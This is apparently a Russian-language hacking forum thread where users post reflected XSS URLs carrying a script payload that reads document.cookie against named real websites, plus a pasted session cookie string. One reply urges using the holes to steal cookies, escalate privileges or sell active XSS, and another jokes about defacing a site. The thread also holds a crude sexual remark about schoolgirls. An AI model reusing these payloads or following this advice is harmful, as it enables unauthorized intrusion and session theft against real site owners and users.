а вот еще че то поинтересние нашел _http://www.triopoker.com/ru/turniere/promotions_detail.cfm?id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
еще че то нашел Укажите значения всех обязательных для заполнения полей (помечены звездочкой) **************************************************************************** http://www.vbarcaru.net/ ******************************************************************************* Некорректный синтаксис email-адреса! ******************************************************************************* сверху и с низу тоже походу пасивка
PHPSESSID=99129c2c1143494cc09e9dee6791ea68; __utma=198015930.308166606.1242852523.1242852523.1242852523.1; __utmb=198015930.1.10.1242852523; __utmc=198015930; __utmz=198015930.1242852523.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=%D1%81%D0%B0%D0%B9%D1%82%D1%8B *********************************************************************** http://dir.od.ua
вот еще одная http://www.villagio.ru/villages/?id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
ТС, найденные тобой xss практически ничего из себя не представляют. Релизуй на их основании атаки - кукисы воруй и т.д. и повышай привелегии. Вот если ты найдешь активную xss на популярном ресурсе - это другое дело, джае если сам не сможешь ничего с ней рпидумать - ты её сможешь продать. во втором классе у одноклассниц еще не выросли сиськи.
Ты чо такое говоришь! да ведь можно с их помощью хакнуть этот сайт, и изменить там все страницы на порно! Вот так вот ТС.. ты великий хакер тут ни один не мог найти такие уязвимости как ты!!11